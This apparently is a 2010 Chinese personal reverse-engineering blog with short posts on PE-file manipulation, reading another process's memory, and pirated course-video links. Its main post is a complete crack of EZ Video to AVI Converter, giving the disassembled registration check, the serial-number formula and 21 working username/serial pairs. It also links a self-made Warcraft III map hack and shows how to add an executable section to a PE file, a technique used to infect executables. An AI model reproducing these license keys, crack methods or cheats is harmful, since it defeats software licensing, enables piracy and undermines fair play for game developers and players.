0040200C   .  FF15 34914000 call    dword ptr [<&KERNEL32.SetFileTime>]          ; \SetFileTime
00402012   .  FF75 D4       push    dword ptr [ebp-2C]                           ;  还原设置文件时间

00402293   > \6A 00         push    0
00402295   .  6A 00         push    0
00402297   .  FFB5 E0FEFFFF push    dword ptr [ebp-120]
0040229D   .  FF15 24904000 call    dword ptr [<&ADVAPI32.StartServiceA>]        ;  ADVAPI32.StartServiceA启动服务

PE头变形~~

零度x — Fri, 28 May 2010 05:50:28 +0000

思路来自小鱼的文章

show图纪念~！~

手工给PE文件添加区块

零度x — Mon, 24 May 2010 03:55:57 +0000

1.在区块表(section table)中最后一个IMAGE_SECTION_TABLE后面添加一个IMAGE_SECTION_TABLE
IMAGE_SECTION_TABLE 结构如下
typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    union {
            DWORD   PhysicalAddress;
            DWORD   VirtualSize;
    } Misc;
    DWORD   VirtualAddress;
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    DWORD   PointerToRelocations;
    DWORD   PointerToLinenumbers;
    WORD    NumberOfRelocations;
    WORD    NumberOfLinenumbers;
    DWORD   Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
按照结构添加一个长度为1000h名为.lingdux的区块：

名称：.lingdux
真实长度：1000h
RVA地址：290000h
文件中对齐后的尺寸：1000h
在文件中的偏移：0028d730
其他00填充
区块属性：E0200000(可读可写可执行)

添加好后修改PE头处NumberOfSections,从4改为5

修正SizeOfImage，文件大小发生变化，故修改之

2.在文件末尾插入1000h的数据块

科锐内部C语言视频教程

零度x — Fri, 21 May 2010 07:52:39 +0000

解压密码：www.lingdux.com

变量类别与编译预处理A.rar
http://www.xun6.com/file/54e974021/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86A.rar.html

变量类别与编译预处理B.rar
http://www.xun6.com/file/9d7605421/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86B.rar.html

变量类别与编译预处理C.rar
http://www.xun6.com/file/253eb5b21/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86C.rar.html

IEEE-条件-循环A.rar
http://www.xun6.com/file/be38fee21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFA.rar.html

IEEE-条件-循环B.rar
http://www.xun6.com/file/a0d175f21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFB.rar.html

IEEE-条件-循环C.rar
http://www.xun6.com/file/796810f21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFC.rar.html

IEEE-条件-循环D.rar
http://www.xun6.com/file/b3c98f021/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFD.rar.html

数组A.rar
http://www.xun6.com/file/7670bdc21/%E6%95%B0%E7%BB%84A.rar.html

数组B.rar
http://www.xun6.com/file/8322ca221/%E6%95%B0%E7%BB%84B.rar.html

数组C.rar
http://www.xun6.com/file/61f1b9d21/%E6%95%B0%E7%BB%84C.rar.html

指针（一）A.rar
http://www.xun6.com/file/1a11d1a21/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89A.rar.html

指针（一）B.rar
http://www.xun6.com/file/162f9d221/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89B.rar.html

指针（一）C.rar
http://www.xun6.com/file/69b791521/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89C.rar.html

指针（一）D.rar
http://www.xun6.com/file/84ab48421/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89D.rar.html

指针（二）A.rar
http://www.xun6.com/file/967b7d821/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89A.rar.html

指针（二）B.rar
http://www.xun6.com/file/bff90b121/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89B.rar.html

指针（二）C.rar
http://www.xun6.com/file/524d63a21/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89C.rar.html

指针（二）D.rar
http://www.xun6.com/file/7ebcb2121/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89D.rar.html

指针（二）E.rar
http://www.xun6.com/file/b9190f521/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89E.rar.html

函数A.rar
http://www.xun6.com/file/ace1da221/%E5%87%BD%E6%95%B0A.rar.html

函数B.rar
http://www.xun6.com/file/9bd43c821/%E5%87%BD%E6%95%B0B.rar.html

函数C.rar
http://www.xun6.com/file/b3e2a1121/%E5%87%BD%E6%95%B0C.rar.html

编译A.rar
http://www.xun6.com/file/8322acb21/%E7%BC%96%E8%AF%91A.rar.html

编译B.rar
http://www.xun6.com/file/89a25f621/%E7%BC%96%E8%AF%91B.rar.html

字符串处理.rar
http://www.xun6.com/file/a71d65921/%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%A4%84%E7%90%86.rar.html

文件操作.rar
http://www.xun6.com/file/fe96d5321/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C.rar.html

文件结构.rar
http://www.xun6.com/file/529124c21/%E6%96%87%E4%BB%B6%E7%BB%93%E6%9E%84.rar.html

获取其它进程的启动参数

零度x — Sat, 08 May 2010 12:20:06 +0000

void GetWindowCommandLine(char *buffer,DWORD pid)
{
CHAR *P=::GetCommandLine();
char *pEvn;
char *pAddr;
char *pFunction;
pFunction=(char *)::GetCommandLine;
memcpy(&pAddr,pFunction+1,sizeof(char *));
DWORD dwRet;
HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS, false,pid);
::ReadProcessMemory(hProcess, pAddr,&pEvn, sizeof(DWORD),&dwRet);
char Buff[512];
::ReadProcessMemory(hProcess, pEvn, Buff, 512, &dwRet);
strcpy(buffer,Buff);
CloseHandle(hProcess);
}

EZ VIDEO TO AVI Converter注册码分析

零度x — Fri, 07 May 2010 04:01:01 +0000

Eztoo AVI Video Converter 是一个功能强大的AVI格式转换工具，可以将MPEG(MPG)、WMV(ASF、ASX)、AVI(DivX、XviD)、VCD格式转换为AVI格式的文件。它使用方便，鼠标点击就可以完成转换，转换速度很快，质量也很好，支持进行批量和自动转换，也可以自己设定相应的参数来输出AVI文件。在它的帮助下，转换工作变得非常轻松。

下载地址：http://www.newhua.com/soft/56777.htm

安装后运行，提示注册，随意输入提示“invalid register code! please retry!”

然后找字符串的调用位置如下：

004B03F6   . 55            push    ebp
004B03F7   . 68 FE054B00   push    004B05FE
004B03FC   . 64:FF30       push    dword ptr fs:[eax]
004B03FF   . 64:8920       mov     dword ptr fs:[eax], esp
004B0402   . C605 9C7D4B00>mov     byte ptr [4B7D9C], 1             ; 全局变量
004B0409   . FF05 987D4B00 inc     dword ptr [4B7D98]               ; ———-3次输入限制————-

004B040F   . 833D 987D4B00>cmp     dword ptr [4B7D98], 3
004B0416      7E 07         jle     short 004B041F
004B0418   . 8BC7          mov     eax, edi
004B041A   . E8 B907FDFF   call    00480BD8                         ; ————————————————
004B041F   > 8D55 F4       lea     edx, dword ptr [ebp-C]
004B0422   . 8B87 1C030000 mov     eax, dword ptr [edi+31C]
004B0428   . E8 0342FBFF   call    00464630                         ; 取用户名
004B042D   . 8B45 F4       mov     eax, dword ptr [ebp-C]
004B0430   . 8D55 FC       lea     edx, dword ptr [ebp-4]
004B0433   . E8 7C82F5FF   call    004086B4
004B0438   . 8D55 F0       lea     edx, dword ptr [ebp-10]
004B043B   . 8B45 FC       mov     eax, dword ptr [ebp-4]
004B043E   . E8 A582F5FF   call    004086E8                         ; strcpy复制用户名
004B0443   . 8B55 F0       mov     edx, dword ptr [ebp-10]
004B0446   . 8D45 FC       lea     eax, dword ptr [ebp-4]
004B0449   . E8 763EF5FF   call    004042C4
004B044E   . BB 15000000   mov     ebx, 15                          ; —————–比较用户名——————–
004B0453   . BE CC5A4B00   mov     esi, 004B5ACC
004B0458   > 8B45 FC       mov     eax, dword ptr [ebp-4]           ; 用户名
004B045B   . 8B16          mov     edx, dword ptr [esi]             ; 真正的用户名
004B045D   . E8 D641F5FF   call    00404638                         ; 比较
004B0462   . 75 09         jnz     short 004B046D
004B0464   . C605 9C7D4B00>mov     byte ptr [4B7D9C], 0             ; 相等则全局变量置0
004B046B   . EB 06         jmp     short 004B0473
004B046D   > 83C6 04       add     esi, 4
004B0470   . 4B            dec     ebx
004B0471   .^ 75 E5         jnz     short 004B0458
004B0473   > 803D 9C7D4B00>cmp     byte ptr [4B7D9C], 0
004B047A   . 74 1A         je      short 004B0496
004B047C   . 6A 00         push    0
004B047E   . 66:8B0D 0C064>mov     cx, word ptr [4B060C]
004B0485   . B2 02         mov     dl, 2
004B0487   . B8 18064B00   mov     eax, 004B0618                    ; invalid register code! please retry!
004B048C   . E8 7B55F8FF   call    00435A0C
004B0491   . E9 2D010000   jmp     004B05C3                         ; ————————————————
004B0496   > 8D55 EC       lea     edx, dword ptr [ebp-14]
004B0499   . 8B87 20030000 mov     eax, dword ptr [edi+320]
004B049F   . E8 8C41FBFF   call    00464630                         ; 取序列号
004B04A4   . 8B45 EC       mov     eax, dword ptr [ebp-14]
004B04A7   . 8D55 F8       lea     edx, dword ptr [ebp-8]
004B04AA   . E8 0582F5FF   call    004086B4
004B04AF   . 8D55 E8       lea     edx, dword ptr [ebp-18]
004B04B2   . 8B45 F8       mov     eax, dword ptr [ebp-8]
004B04B5   . E8 2E82F5FF   call    004086E8                         ; strcpy复制序列号
004B04BA   . 8B55 E8       mov     edx, dword ptr [ebp-18]
004B04BD   . 8D45 F8       lea     eax, dword ptr [ebp-8]
004B04C0   . E8 FF3DF5FF   call    004042C4
004B04C5   . 837D FC 00    cmp     dword ptr [ebp-4], 0             ; 用户名是否为空
004B04C9   . 0F84 F4000000 je      004B05C3
004B04CF   . 837D F8 00    cmp     dword ptr [ebp-8], 0             ; 序列号是否为空
004B04D3   . 0F84 EA000000 je      004B05C3
004B04D9   . 8B45 F8       mov     eax, dword ptr [ebp-8]
004B04DC   . E8 0B40F5FF   call    004044EC                         ; 取序列号长度
004B04E1   . 85C0          test    eax, eax
004B04E3   . 7E 35         jle     short 004B051A
004B04E5   . BA 01000000   mov     edx, 1                           ; ———–判断序列号每一位是不是数字——————-
004B04EA   > 8B4D F8       mov     ecx, dword ptr [ebp-8]
004B04ED   . 0FB64C11 FF   movzx   ecx, byte ptr [ecx+edx-1]        ; 序列号数组
004B04F2   . 83F9 30       cmp     ecx, 30
004B04F5   . 7C 05         jl      short 004B04FC
004B04F7   . 83F9 39       cmp     ecx, 39
004B04FA   . 7E 1A         jle     short 004B0516
004B04FC   > 6A 00         push    0
004B04FE   . 66:8B0D 0C064>mov     cx, word ptr [4B060C]
004B0505   . B2 02         mov     dl, 2
004B0507   . B8 18064B00   mov     eax, 004B0618                    ; invalid register code! please retry!
004B050C   . E8 FB54F8FF   call    00435A0C
004B0511   . E9 AD000000   jmp     004B05C3
004B0516   > 42            inc     edx
004B0517   . 48            dec     eax
004B0518   .^ 75 D0         jnz     short 004B04EA                   ; ———————————————-
004B051A   > 33F6          xor     esi, esi
004B051C   . 8B45 FC       mov     eax, dword ptr [ebp-4]
004B051F   . E8 C83FF5FF   call    004044EC                         ; 取用户名长度
004B0524   . 85C0          test    eax, eax
004B0526   . 7E 13         jle     short 004B053B
004B0528   . BB 01000000   mov     ebx, 1                           ; ———-用户名ASC求和——————-
004B052D   > 8B55 FC       mov     edx, dword ptr [ebp-4]
004B0530   . 0FB6541A FF   movzx   edx, byte ptr [edx+ebx-1]
004B0535   . 03F2          add     esi, edx
004B0537   . 43            inc     ebx
004B0538   . 48            dec     eax
004B0539   .^ 75 F2         jnz     short 004B052D                   ; ———————————————
004B053B   > 69C6 90B70B00 imul    eax, esi, 0BB790                 ; (用户名ASC和*0×0bb790+0×314)/2
004B0541   . 05 14030000   add     eax, 314
004B0546   . D1F8          sar     eax, 1
004B0548   . 79 03         jns     short 004B054D
004B054A   . 83D0 00       adc     eax, 0
004B054D   > 8BF0          mov     esi, eax
004B054F   . 8B45 F8       mov     eax, dword ptr [ebp-8]
004B0552   . E8 B183F5FF   call    00408908                         ; 序列号转换成十进制数
004B0557   . 3BF0          cmp     esi, eax
004B0559   . 75 53         jnz     short 004B05AE
004B055B   . 6A 00         push    0
004B055D   . 66:8B0D 0C064>mov     cx, word ptr [4B060C]
004B0564   . B2 02         mov     dl, 2
004B0566   . B8 48064B00   mov     eax, 004B0648                    ; congratuation! you have successfully registered!
004B056B   . E8 9C54F8FF   call    00435A0C
004B0570   . A1 9C5E4B00   mov     eax, dword ptr [4B5E9C]
004B0575   . C600 01       mov     byte ptr [eax], 1
004B0578   . A1 945F4B00   mov     eax, dword ptr [4B5F94]
004B057D   . 8B00          mov     eax, dword ptr [eax]
004B057F   . 33C9          xor     ecx, ecx
004B0581   . BA 04000000   mov     edx, 4
004B0586   . 8B18          mov     ebx, dword ptr [eax]
004B0588   . FF53 14       call    dword ptr [ebx+14]
004B058B   . 8B15 9C5E4B00 mov     edx, dword ptr [4B5E9C]          ; EZ_VIDEO.004B7DAC
004B0591   . A1 945F4B00   mov     eax, dword ptr [4B5F94]
004B0596   . 8B00          mov     eax, dword ptr [eax]
004B0598   . B9 01000000   mov     ecx, 1
004B059D   . E8 A2E3F6FF   call    0041E944
004B05A2   . A1 947D4B00   mov     eax, dword ptr [4B7D94]
004B05A7   . E8 2C06FDFF   call    00480BD8
004B05AC   . EB 15         jmp     short 004B05C3
004B05AE   > 6A 00         push    0
004B05B0   . 66:8B0D 0C064>mov     cx, word ptr [4B060C]
004B05B7   . B2 02         mov     dl, 2
004B05B9   . B8 18064B00   mov     eax, 004B0618                    ; invalid register code! please retry!
004B05BE   . E8 4954F8FF   call    00435A0C
004B05C3   > 33C0          xor     eax, eax
004B05C5   . 5A            pop     edx
004B05C6   . 59            pop     ecx
004B05C7   . 59            pop     ecx
004B05C8   . 64:8910       mov     dword ptr fs:[eax], edx
004B05CB   . 68 05064B00   push    004B0605
004B05D0   > 8D45 E8       lea     eax, dword ptr [ebp-18]
004B05D3   . E8 543CF5FF   call    0040422C
004B05D8   . 8D45 EC       lea     eax, dword ptr [ebp-14]
004B05DB   . E8 4C3CF5FF   call    0040422C
004B05E0   . 8D45 F0       lea     eax, dword ptr [ebp-10]
004B05E3   . E8 443CF5FF   call    0040422C
004B05E8   . 8D45 F4       lea     eax, dword ptr [ebp-C]
004B05EB   . E8 3C3CF5FF   call    0040422C
004B05F0   . 8D45 F8       lea     eax, dword ptr [ebp-8]
004B05F3   . BA 02000000   mov     edx, 2
004B05F8   . E8 533CF5FF   call    00404250
004B05FD   . C3            retn
004B05FE   .^ E9 8935F5FF   jmp     00403B8C
004B0603   .^ EB CB         jmp     short 004B05D0
004B0605   . 5F            pop     edi
004B0606   . 5E            pop     esi
004B0607   . 5B            pop     ebx
004B0608   . 8BE5          mov     esp, ebp
004B060A   . 5D            pop     ebp
004B060B   . C3            retn

用户名用数组存放，是给定的，只要满足：

序列号=(用户名ASC和*0×0bb790+0×314)/2

就可以注册成功

用户名和注册码如下：

用户名:                                               序列号:
VqhfwqY-VI3fg486                     517556906
Perf7gJ-T8ydwt86                       529843114
tawer98-SYrw3w76                    533298610
TqervDR-S1e2feP6                      516405074
OafegD6-LVrs5eU1                      509878026
Taqevq9-S7el9qT1                       529075226
rdgtrp6-ZV1m8ynN                     559406802
BqredCw-VQvWVdB1                 536754106
BsdewfA-VKmVBaB1                   517172962
BMertyD-VAwkEBKB                   522548178
Ouijnsr-AKzO0u47                      539057770
Oftyuf8-KO109vf1                        504886754
iknfEML-VKdiMPO1                     515253242
Ipdwwa6-VEJ6yvU1                   527923394
IgvcdJT-BBYsrYX1                     526771562
DawqaUl-tqeLwlV1                     575916394
SsegbT6-DVlrmf99                      531378890
erswqwS-AKfnlp41                      569005402
SweNrvQ-TTdtgjN1                    560174690
gaeuprE-MIrgbnN3                   561326522
ZsfdeS6-M9ofvpN3                     535986218

魔兽开图 by 零度x

零度x — Thu, 06 May 2010 11:59:53 +0000

无聊写了一个魔兽开图
测试1.24有效，对战平台未测，估计对战平台有检测机制，需要处理。

下载地址：http://www.lingdux.com/upload/maphacker.rar

续费域名

零度x — Sun, 02 May 2010 06:40:40 +0000

去年5月份注册的域名，这段时间在学校呆着，很久没有上网，终于五一放假，有时间了，马上给了域名续了费。godaddy域名价格比去年涨了好多，起码对我来说算很多，用优惠码是7.49刀每年。上次去兑换美元，人家没有零钱，只能换100的。索性直接续费9年。唉，一个多月的生活费啊~！~